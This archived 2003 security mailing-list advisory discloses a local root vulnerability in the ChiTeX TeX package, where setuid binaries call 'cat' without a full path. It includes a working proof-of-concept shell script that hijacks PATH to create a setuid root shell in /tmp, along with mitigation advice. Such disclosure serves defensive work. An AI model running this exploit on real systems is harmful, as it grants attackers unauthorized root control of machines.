[UNIX] ChiTeX Local Root Vulnerability

From: support@securiteam.com
Date: 04/21/03

  • Next message: support@securiteam.com: "[NEWS] Interbase ISC_LOCK_ENV Overflow" 
    From: support@securiteam.com
To: list@securiteam.com
Date: 21 Apr 2003 19:27:33 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    In the US?

    Contact Beyond Security at our new California office
    housewarming rates on automated network vulnerability
    scanning. We also welcome ISPs and other resellers!

    Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
    - - - - - - - - -

      ChiTeX Local Root Vulnerability
    ------------------------------------------------------------------------

    SUMMARY

    ChiTeX can be used to put Chinese Big5 codes in TeX/LaTeX documents.
    Operations with the ChiTeX are just like the English TeX, apart from some
    special instructions in it. For more information about this package, refer
    to the homepage of the author Chen Hung-Yih:
    <http://www.math.ncu.edu.tw/~yih/intro.htm>
    http://www.math.ncu.edu.tw/~yih/intro.htm (Chinese)

    The ChiTeX package contains two setuid root binaries that execute cat
    without using an explicit path. This bug can allow local users to gain
    root level privileges.

    DETAILS

    Vulnerable systems:
     * ChiTeX version 6.1.2p7.8-1

    The setuid root binaries chadd and chaddpfbname use the following system()
    functions:

    chadd:
    system("cat special.tmp >> $TEXMF/fontname/special.map");

    chaddpfbname:
    system("cat psfontsmap@ >> $psfontsmap");
    system("cat psfontsmap@ >> $pdftexmap");

    As you can see, cat is executed without using a full path. If a user
    creates a file called 'cat' in /tmp, adds /tmp to $PATH and then executes
    chadd or chaddpfbname, the cat file will be executed with root privileges.

    A user can also create a file named 'psfontsmap@' and let chaddpfbname
    append this file's content to any file defined in the $pdftexmap or
    $psfontsmap environment variables.

    The script below will demonstrate this vulnerability by creating a setuid
    root shell and the file /tmp/owned (with 'owned' as content)

    --- start ---

    #!/bin/sh
    echo 'owned' > 'psfontsmap@'
    export psfontsmap=/tmp/owned
    echo "/bin/cp /bin/sh /tmp/.sh" > /tmp/cat
    echo "/bin/chmod 4755 /tmp/.sh" >> /tmp/cat
    chmod +x /tmp/cat
    cd /tmp
    export PATH="/tmp:$PATH"
    /usr/local/bin/chaddpfbname
    /tmp/.sh -c id
    /tmp/.sh

    --- stop ---

    Note this is simple proof of concept code: you might have to change the
    path to chaddpfbname.

    Fix information:
    The author, professor Chen Hung-Yih, was been notified about this issue
    several weeks ago but unfortunately, did not release a fix yet.

    Remove the setuid permissions from the binaries.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:zillion@safemode.org>
    zillion.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: support@securiteam.com: "[NEWS] Interbase ISC_LOCK_ENV Overflow"